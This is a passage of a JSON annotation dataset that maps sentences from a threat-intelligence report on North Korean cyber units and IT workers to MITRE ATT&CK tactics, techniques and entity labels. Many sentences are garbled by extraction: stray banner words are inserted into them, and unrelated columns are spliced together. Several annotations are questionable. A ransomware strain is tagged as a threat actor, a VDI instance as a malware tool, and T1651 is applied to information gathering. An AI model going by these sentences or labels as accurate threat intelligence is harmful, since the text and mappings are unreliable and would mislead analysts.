additional rations.", "sentence_text": "The training pipeline almost certainly diverges once these students reach university, when the best students are selected to study WORKFORCE computer science and hacking IT at the country’s best universities HIDDEN in Pyongyang.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Selects best students to study computer science and hacking at Pyongyang universities", "entities": [ { "text": "Pyongyang", "start": 218, "end": 227, "label": "Infrastructure_Indicator" }, { "text": "selected ", "start": 113, "end": 122, "label": "Action" }, { "text": "study ", "start": 125, "end": 131, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p12-s107-67aa06", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 12, "sentence_id": 107, "context_before": "The training pipeline almost certainly diverges once these students reach university, when the best students are selected to study WORKFORCE computer science and hacking IT at the country’s best universities HIDDEN in Pyongyang.", "sentence_text": "Upon graduation, AND they are either commissioned as officers in the Korean People’s Army (KPA) and assigned to the SYNDICATE Reconnaissance General Bureau CYBER(RGB) or are selected to join one of many IT-focused organizations Figure 3.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p12-s108-b071e0", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 12, "sentence_id": 108, "context_before": "Upon graduation, AND they are either commissioned as officers in the Korean People’s Army (KPA) and assigned to the SYNDICATE Reconnaissance General Bureau CYBER(RGB) or are selected to join one of many IT-focused organizations Figure 3.", "sentence_text": "A mural in the courtyard of the Kumsong Academy complex depicts Kim Il DPRK’S Sung and Kim Jong-un smiling alongside students working on computers.subordinate to the Munitions Industry Department (MID) or Ministry EXPOSINGof National Defense (MND).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p13-s109-15f4d5", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 13, "sentence_id": 109, "context_before": "A mural in the courtyard of the Kumsong Academy complex depicts Kim Il DPRK’S Sung and Kim Jong-un smiling alongside students working on computers.subordinate to the Munitions Industry Department (MID) or Ministry EXPOSINGof National Defense (MND).", "sentence_text": "Assessed Talent Pipeline DPRK Reconnaissance Cyber Colleges General Bureau Ministry of State Security Korean PRIORITY People's Army General Use ITW Survival at Stake: The Pressure of DPRK Cyber Quotas", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p13-s110-9cb422", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 13, "sentence_id": 110, "context_before": "Assessed Talent Pipeline DPRK Reconnaissance Cyber Colleges General Bureau Ministry of State Security Korean PRIORITY People's Army General Use ITW Survival at Stake: The Pressure of DPRK Cyber Quotas", "sentence_text": "These earnings goals are rigid and force North Korean workers to constantly adapt and seek new means of generating income.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Constantly adapts and seeks new means to generate income under rigid quotas", "entities": [ { "text": " North Korean workers", "start": 40, "end": 61, "label": "ThreatActor" }, { "text": "seek ", "start": 86, "end": 91, "label": "Action" }, { "text": "adapt ", "start": 76, "end": 82, "label": "Action" }, { "text": " generating income", "start": 103, "end": 121, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p13-s111-3427b3", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 13, "sentence_id": 111, "context_before": "These earnings goals are rigid and force North Korean workers to constantly adapt and seek new means of generating income.", "sentence_text": "These quotas also foster a culture of competition within teams, with workers seeking to gain advantages over their colleagues to receive favors and be allowed to send more money back to their families.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p13-s112-6d9e97", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 13, "sentence_id": 112, "context_before": "These quotas also foster a culture of competition within teams, with workers seeking to gain advantages over their colleagues to receive favors and be allowed to send more money back to their families.", "sentence_text": "All forward-deployed and domestic teams targeting U.S. IT healthcare entities.are required to self-fund, meaning that all their operational infrastructure, utilities, and HIDDEN salaries are derived from what they can earn, rather than money received from a central AND authority in Pyongyang.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Self-funds operations by targeting U.S. healthcare entities", "entities": [ { "text": " U.S. IT healthcare entities", "start": 49, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "operational infrastructure", "start": 128, "end": 154, "label": "Infrastructure_Indicator" }, { "text": "Pyongyang", "start": 283, "end": 292, "label": "Infrastructure_Indicator" }, { "text": "self-fund", "start": 94, "end": 103, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p13-s113-94b35a", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 13, "sentence_id": 113, "context_before": "All forward-deployed and domestic teams targeting U.S. IT healthcare entities.are required to self-fund, meaning that all their operational infrastructure, utilities, and HIDDEN salaries are derived from what they can earn, rather than money received from a central AND authority in Pyongyang.", "sentence_text": "Historically, this self-funding activity has involved everything from ATM scams to ransomware and even in some cases subcontracting of IT work to non-North Korean individuals.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" }, { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Self-funds through ATM scams, ransomware, and subcontracting IT work", "entities": [ { "text": "ransomware ", "start": 83, "end": 94, "label": "MalwareTool" }, { "text": "ATM scams", "start": 70, "end": 79, "label": "Infrastructure_Indicator" }, { "text": "IT work", "start": 135, "end": 142, "label": "Infrastructure_Indicator" }, { "text": "subcontracting ", "start": 117, "end": 132, "label": "Action" }, { "text": " self-funding ", "start": 18, "end": 32, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p13-s114-65cfa0", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 13, "sentence_id": 114, "context_before": "Historically, this self-funding activity has involved everything from ATM scams to ransomware and even in some cases subcontracting of IT work to non-North Korean individuals.", "sentence_text": "Much of this activity falls below the threshold where it SYNDICATE would be formally tracked and reported as attributable to North Korea, complicating our CYBERunderstanding of what activities these groups undertake.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p13-s115-c0b55d", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 13, "sentence_id": 115, "context_before": "Much of this activity falls below the threshold where it SYNDICATE would be formally tracked and reported as attributable to North Korea, complicating our CYBERunderstanding of what activities these groups undertake.", "sentence_text": "DPRK’S\nEXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p14-s116-89071b", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 14, "sentence_id": 116, "context_before": "DPRK’S\nEXPOSING", "sentence_text": "The Rise of Side Gigs It appears that Pyongyang is also catching on to the potential windfall that would accompany more units’ involvement in cybercriminal activities beyond DTEX Insider Intelligence and Investigations merely permitting these groups to steal enough (i³) has identified that North Korean IT workers money to keep the lights on.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Expands involvement in cybercriminal activities beyond basic funding needs", "entities": [ { "text": "Pyongyang ", "start": 38, "end": 48, "label": "ThreatActor" }, { "text": " North Korean IT workers", "start": 290, "end": 314, "label": "ThreatActor" }, { "text": "involvement ", "start": 127, "end": 139, "label": "Action" }, { "text": "steal ", "start": 253, "end": 259, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p14-s117-ed7dec", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 14, "sentence_id": 117, "context_before": "The Rise of Side Gigs It appears that Pyongyang is also catching on to the potential windfall that would accompany more units’ involvement in cybercriminal activities beyond DTEX Insider Intelligence and Investigations merely permitting these groups to steal enough (i³) has identified that North Korean IT workers money to keep the lights on.", "sentence_text": "Koreans experimenting with cybercriminal operations to meet their quotas.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Experiments with cybercriminal operations to meet quotas", "entities": [ { "text": "Koreans ", "start": 0, "end": 8, "label": "ThreatActor" }, { "text": "experimenting ", "start": 8, "end": 22, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p14-s118-724c4d", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 14, "sentence_id": 118, "context_before": "Koreans experimenting with cybercriminal operations to meet their quotas.", "sentence_text": "These workers have been observed using corporate infrastructure as bastion hosts to carry According to a blog on Moonstone Sleet actors— out non-work-related activities linked to their side whose malware bears some similarities to historic gigs.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Uses corporate infrastructure as bastion hosts for side gig activities", "entities": [ { "text": "Moonstone Sleet", "start": 113, "end": 128, "label": "ThreatActor" }, { "text": "corporate infrastructure", "start": 39, "end": 63, "label": "Infrastructure_Indicator" }, { "text": " bastion hosts", "start": 66, "end": 80, "label": "Infrastructure_Indicator" }, { "text": "using ", "start": 33, "end": 39, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p14-s119-9df553", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 14, "sentence_id": 119, "context_before": "These workers have been observed using corporate infrastructure as bastion hosts to carry According to a blog on Moonstone Sleet actors— out non-work-related activities linked to their side whose malware bears some similarities to historic gigs.", "sentence_text": "Such activities include creating sock puppet TEMP.Hermit malware—using the Qilin ransomware accounts on freelance platforms (e.g., Upwork, gang’s payload to compromise several targets.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1585", "name": "Establish Accounts" } ], "procedure": "Creates sock puppet accounts on freelance platforms", "entities": [ { "text": " TEMP.Hermit", "start": 44, "end": 56, "label": "ThreatActor" }, { "text": "Qilin ransomware", "start": 75, "end": 91, "label": "ThreatActor" }, { "text": "freelance platforms", "start": 104, "end": 123, "label": "Infrastructure_Indicator" }, { "text": "Upwork", "start": 131, "end": 137, "label": "Infrastructure_Indicator" }, { "text": "creating ", "start": 24, "end": 33, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p14-s120-31d445", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 14, "sentence_id": 120, "context_before": "Such activities include creating sock puppet TEMP.Hermit malware—using the Qilin ransomware accounts on freelance platforms (e.g., Upwork, gang’s payload to compromise several targets.", "sentence_text": "mandate may have been expanded based on their successes over the last few years.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p14-s121-48dbf2", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 14, "sentence_id": 121, "context_before": "mandate may have been expanded based on their successes over the last few years.", "sentence_text": "See the In Focus: IT Workers section for more information.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p14-s122-1d3b7a", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 14, "sentence_id": 122, "context_before": "See the In Focus: IT Workers section for more information.", "sentence_text": "WORKFORCE\nIT\nHIDDEN\nAND\nSYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p15-s123-e49f09", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 15, "sentence_id": 123, "context_before": "WORKFORCE\nIT\nHIDDEN\nAND\nSYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "sentence_text": "Navigating DPRK’s Cyber Ranks", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p15-s124-74b223", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 15, "sentence_id": 124, "context_before": "Navigating DPRK’s Cyber Ranks", "sentence_text": "The DPRK’s cyber program has rapidly evolved since the Sony Attack in 2014, suggesting that the original operators tracked as APT38/Lazarus/Hidden Cobra have similarly aged up in the ranks.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Evolved cyber program and advanced original operators in ranks", "entities": [ { "text": "DPRK", "start": 4, "end": 8, "label": "ThreatActor" }, { "text": "APT38", "start": 126, "end": 131, "label": "ThreatActor" }, { "text": "Lazarus", "start": 132, "end": 139, "label": "ThreatActor" }, { "text": "Hidden Cobra", "start": 140, "end": 152, "label": "ThreatActor" }, { "text": "evolved ", "start": 37, "end": 45, "label": "Action" }, { "text": "aged up in the ranks", "start": 168, "end": 188, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p15-s125-7de0b5", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 15, "sentence_id": 125, "context_before": "The DPRK’s cyber program has rapidly evolved since the Sony Attack in 2014, suggesting that the original operators tracked as APT38/Lazarus/Hidden Cobra have similarly aged up in the ranks.", "sentence_text": "These individuals are very likely to be middle to senior managers of cyber units and IT teams, judging from defector reports of computer science career progression.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p15-s126-56824d", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 15, "sentence_id": 126, "context_before": "These individuals are very likely to be middle to senior managers of cyber units and IT teams, judging from defector reports of computer science career progression.", "sentence_text": "If true, these individuals are assessed to have certainly brought the knowledge and tools developed over the course of their careers to their new units.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p15-s127-185ca4", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 15, "sentence_id": 127, "context_before": "If true, these individuals are assessed to have certainly brought the knowledge and tools developed over the course of their careers to their new units.", "sentence_text": "These former cyber actors may also remain in communication, sharing knowledge across teams and organizations even if the regime does not formally allow such communication.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Share knowledge across teams and organizations informally", "entities": [ { "text": "sharing knowledge", "start": 60, "end": 77, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p15-s128-671271", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 15, "sentence_id": 128, "context_before": "These former cyber actors may also remain in communication, sharing knowledge across teams and organizations even if the regime does not formally allow such communication.", "sentence_text": "We specifically noticed this with APT45, where APT managers seemed to have communication or oversight of IT teams.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Maintained communication and oversight between APT managers and IT teams", "entities": [ { "text": "APT45", "start": 34, "end": 39, "label": "ThreatActor" }, { "text": "communication ", "start": 75, "end": 89, "label": "Action" }, { "text": "oversight ", "start": 92, "end": 102, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p15-s129-4757c3", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 15, "sentence_id": 129, "context_before": "We specifically noticed this with APT45, where APT managers seemed to have communication or oversight of IT teams.", "sentence_text": "TEMP.Hermit • APT43 • TEMP.Hermit • ITW •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p15-s130-bbf1f0", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 15, "sentence_id": 130, "context_before": "TEMP.Hermit • APT43 • TEMP.Hermit • ITW •", "sentence_text": "TEMP.Hermit • Konni • Malicious ITW • TraderTraitor • APT37 • APT45 • APT37 • Ruby Sleet • APT37 • ITW • Moonstone Sleet • AppleJeus • APT38 • Konni • APT43 • CryptoCore • APT43 • Ruby Sleet • AI Unit227 • Crypto Crime •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p15-s131-03aef8", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 15, "sentence_id": 131, "context_before": "TEMP.Hermit • Konni • Malicious ITW • TraderTraitor • APT37 • APT45 • APT37 • Ruby Sleet • APT37 • ITW • Moonstone Sleet • AppleJeus • APT38 • Konni • APT43 • CryptoCore • APT43 • Ruby Sleet • AI Unit227 • Crypto Crime •", "sentence_text": "APT45 • TraderTraitor • APT45 • Gwisin Gang • CryptoCore • Front Companies • Konni • AppleJeus • Front Companies INITIAL RECRUITS NOW CADRE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p16-s132-be5226", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 16, "sentence_id": 132, "context_before": "APT45 • TraderTraitor • APT45 • Gwisin Gang • CryptoCore • Front Companies • Konni • AppleJeus • Front Companies INITIAL RECRUITS NOW CADRE", "sentence_text": "Advancing the Regime Through Information Sharing Alongside the likely movement of former Ministry of State Security (MSS) and RGB cyber operatives into managerial roles, North Korea’s cyber units may also benefit from insights gleaned from overseas workers; information from their employers and skills acquired through work experience may be gathered on any topic that may benefit the regime and remitted to North Korea on a consistent basis.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1651", "name": "Cloud Administration Command" } ], "procedure": "Moves operatives to managerial roles and gathers insights from overseas workers for regime benefit", "entities": [ { "text": "Ministry of State Security (MSS)", "start": 89, "end": 121, "label": "ThreatActor" }, { "text": "RGB ", "start": 126, "end": 130, "label": "ThreatActor" }, { "text": "North Korea", "start": 170, "end": 181, "label": "ThreatActor" }, { "text": "benefit ", "start": 373, "end": 381, "label": "Action" }, { "text": "benefit ", "start": 205, "end": 213, "label": "Action" }, { "text": "gleaned ", "start": 227, "end": 235, "label": "Action" }, { "text": "gathered ", "start": 342, "end": 351, "label": "Action" }, { "text": "remitted ", "start": 396, "end": 405, "label": "Action" }, { "text": "movement ", "start": 70, "end": 79, "label": "Action" }, { "text": " North Korea", "start": 407, "end": 419, "label": "ThreatActor" } ] }, { "uid": "mitre-79_mitre_report-p16-s133-350f97", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 16, "sentence_id": 133, "context_before": "Advancing the Regime Through Information Sharing Alongside the likely movement of former Ministry of State Security (MSS) and RGB cyber operatives into managerial roles, North Korea’s cyber units may also benefit from insights gleaned from overseas workers; information from their employers and skills acquired through work experience may be gathered on any topic that may benefit the regime and remitted to North Korea on a consistent basis.", "sentence_text": "DPRK IT teams are required to report their projects and earnings up their managerial chain on a regular basis and keep detailed records of their work, which may provide additional insight for hacking teams if they are able to access these reports.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1119", "name": "Automated Collection" } ], "procedure": "Report projects and earnings up managerial chain and keep detailed work records", "entities": [ { "text": "DPRK ", "start": 0, "end": 5, "label": "ThreatActor" }, { "text": "keep detailed records", "start": 114, "end": 135, "label": "Action" }, { "text": "report ", "start": 30, "end": 37, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p16-s134-a82872", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 16, "sentence_id": 134, "context_before": "DPRK IT teams are required to report their projects and earnings up their managerial chain on a regular basis and keep detailed records of their work, which may provide additional insight for hacking teams if they are able to access these reports.", "sentence_text": "Upward mobility in the North Korean system requires KWP membership and marrying well, so it is possible that these individuals may share information or operational infrastructure that 16will give their relatives or families a comparative advantage over others in their units.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Share information and operational infrastructure to provide advantages to relatives", "entities": [ { "text": "North Korean", "start": 23, "end": 35, "label": "ThreatActor" }, { "text": "operational infrastructure", "start": 152, "end": 178, "label": "Infrastructure_Indicator" }, { "text": " share information", "start": 130, "end": 148, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p16-s135-a385da", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 16, "sentence_id": 135, "context_before": "Upward mobility in the North Korean system requires KWP membership and marrying well, so it is possible that these individuals may share information or operational infrastructure that 16will give their relatives or families a comparative advantage over others in their units.", "sentence_text": "Exploiting Insider Access: Lessons in Vetting and Monitoring Hypothetically, a North Korean cyber unit with access to information collected by an IT WORKFORCE team specializing in blockchain freelance work could obtain critical information about IT code vulnerabilities and project teams to target in a future cybercrime operation.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1591", "name": "Gather Victim Org Information" } ], "procedure": "Obtains information on code vulnerabilities and project teams from insider IT access", "entities": [ { "text": "North Korean cyber unit", "start": 79, "end": 102, "label": "ThreatActor" }, { "text": "blockchain freelance work", "start": 180, "end": 205, "label": "Infrastructure_Indicator" }, { "text": "code vulnerabilities", "start": 249, "end": 269, "label": "Infrastructure_Indicator" }, { "text": " project teams", "start": 273, "end": 287, "label": "Infrastructure_Indicator" }, { "text": "obtain ", "start": 212, "end": 219, "label": "Action" }, { "text": "target ", "start": 291, "end": 298, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p16-s136-dade0d", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 16, "sentence_id": 136, "context_before": "Exploiting Insider Access: Lessons in Vetting and Monitoring Hypothetically, a North Korean cyber unit with access to information collected by an IT WORKFORCE team specializing in blockchain freelance work could obtain critical information about IT code vulnerabilities and project teams to target in a future cybercrime operation.", "sentence_text": "Even if HIDDEN this rarely occurs, the possibility highlights the importance of carefully vetting employees AND and understanding who has access to an organization’s information.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p16-s137-886bcf", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 16, "sentence_id": 137, "context_before": "Even if HIDDEN this rarely occurs, the possibility highlights the importance of carefully vetting employees AND and understanding who has access to an organization’s information.", "sentence_text": "The average North Korean overseas worker may not be formally trained to hack or use their insider access, but it is possible that the information they collect from an organization may be received and operationalized by an extremely capable North Korean cyber unit.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p16-s138-eaf42f", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 16, "sentence_id": 138, "context_before": "The average North Korean overseas worker may not be formally trained to hack or use their insider access, butit is possible that the information they collect from an organization may be received and SYNDICATE operationalized by an extremely capable North Korean cyber unit.", "sentence_text": "In the limited cases we’ve CYBERobserved where IT workers attempt to extort their former employers, they allude to this exact scenario in their threats.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Attempt to extort former employers", "entities": [ { "text": "extort ", "start": 69, "end": 76, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p16-s139-818aaa", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 16, "sentence_id": 139, "context_before": "In the limited cases we’ve CYBERobserved where IT workers attempt to extort their former employers, they allude to this exact scenario in their threats.", "sentence_text": "DPRK’S EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p17-s140-eb1935", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 17, "sentence_id": 140, "context_before": "DPRK’S EXPOSING", "sentence_text": "The Cutthroat Reality of the DPRK The DPRK cyber ecosystem could be best described as a “dog eat dog world,” where the only real winners are Kim Jong-un’s family and the North Korean elites who benefit from the luxury goods that are likely purchased using funds generated by the cyber program.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p17-s141-0f2950", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 17, "sentence_id": 141, "context_before": "The Cutthroat Reality of the DPRK The DPRK cyber ecosystem could be best described as a “dog eat dog world,” where the only real winners are Kim Jong-un’s family and the North Korean elites who benefit from the luxury goods that are likely purchased using funds generated by the cyber program.", "sentence_text": "The average North Korean threat actor or IT worker almost certainly keeps less than 20% of their earnings; like other criminal syndicate models, there are supply chain costs that need to be accounted for.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p17-s142-39310f", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 17, "sentence_id": 142, "context_before": "The average North Korean threat actor or IT worker almost certainly keeps less than 20% of their earnings; like other criminal syndicate models, there are supply chain costs that need to be accounted for.", "sentence_text": "We have never seen indications that North Korea’s best cybercriminal units like TraderTraitor or AppleJeus get to keep any of the billions in stolen cryptocurrency that they’ve generated over the years.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Generated billions in stolen cryptocurrency", "entities": [ { "text": "TraderTraitor ", "start": 80, "end": 94, "label": "ThreatActor" }, { "text": "AppleJeus ", "start": 97, "end": 107, "label": "ThreatActor" }, { "text": "stolen cryptocurrency", "start": 142, "end": 163, "label": "Infrastructure_Indicator" }, { "text": "stolen ", "start": 142, "end": 149, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p17-s143-907591", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 17, "sentence_id": 143, "context_before": "We have never seen indications that North Korea’s best cybercriminal units like TraderTraitor or AppleJeus get to keep any of the billions in stolen cryptocurrency that they’ve generated over the years.", "sentence_text": "They only ever keep enough to buy a server or register a domain for the next operation.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Buys servers and registers domains for operations", "entities": [ { "text": "server ", "start": 36, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "domain ", "start": 57, "end": 64, "label": "Infrastructure_Indicator" }, { "text": "buy ", "start": 30, "end": 34, "label": "Action" }, { "text": "register ", "start": 46, "end": 55, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p17-s144-566d4b", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 17, "sentence_id": 144, "context_before": "They only ever keep enough to buy a server or register a domain for the next operation.", "sentence_text": "Compared to the four- or five-day average work week in most Western countries, it’s not hard to see how the North Koreans are able to evade even the most proactive governments and organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p17-s145-b6b029", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 17, "sentence_id": 145, "context_before": "Compared to the four- or five-day average work week in most Western countries, it’s not hard to see how the North Koreans are able to evade even the most proactive governments and organizations.", "sentence_text": "We have never seen indications that North Korea’s best cybercriminal units like 17 TraderTraitor or AppleJeus get to keep any of the billions in stolen cryptocurrency that they’ve WORKFORCEgenerated over the years.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Generated billions in stolen cryptocurrency", "entities": [ { "text": "AppleJeus ", "start": 100, "end": 110, "label": "ThreatActor" }, { "text": "TraderTraitor ", "start": 83, "end": 97, "label": "ThreatActor" }, { "text": "stolen cryptocurrency", "start": 145, "end": 166, "label": "Infrastructure_Indicator" }, { "text": "generated ", "start": 189, "end": 199, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p17-s146-8b4e02", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 17, "sentence_id": 146, "context_before": "We have never seen indications that North Korea’s best cybercriminal units like 17 TraderTraitor or AppleJeus get to keep any of the billions in stolen cryptocurrency that they’ve WORKFORCEgenerated over the years.", "sentence_text": "IT HIDDEN AND SYNDICATE CYBER DPRK’S EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p18-s147-e48fac", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 18, "sentence_id": 147, "context_before": "IT HIDDEN AND SYNDICATE CYBER DPRK’S EXPOSING", "sentence_text": "Spotlight: Operational Security Lapses Reveal Hidden Patterns REMOTE ACCESS TOOLS", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p18-s148-c3c66a", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 18, "sentence_id": 148, "context_before": "Spotlight: Operational Security Lapses Reveal Hidden Patterns REMOTE ACCESS TOOLS", "sentence_text": "Other remote workers may also utilize remote access DPRK IT WORKER tools to access the device for one company (Company A)\nand use this device as a host to connect to another company (Company B) via a separate VDI instance.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "Utilizes remote access tools to connect from one company's device to another via VDI", "entities": [ { "text": "DPRK IT WORKER", "start": 52, "end": 66, "label": "ThreatActor" }, { "text": " VDI instance", "start": 208, "end": 221, "label": "MalwareTool" }, { "text": "utilize ", "start": 30, "end": 38, "label": "Action" }, { "text": "access ", "start": 45, "end": 52, "label": "Action" }, { "text": "connect ", "start": 155, "end": 163, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p18-s149-0c9a0c", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 18, "sentence_id": 149, "context_before": "Other remote workers may also utilize remote access DPRK IT WORKER tools to access the device for one company (Company A)\nand use this device as a host to connect to another company (Company B) via a separate VDI instance.", "sentence_text": "COMPANY A\nCompany A could potentially be used as a bastion host to remote into infrastructure for In some cases, other organizations.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": 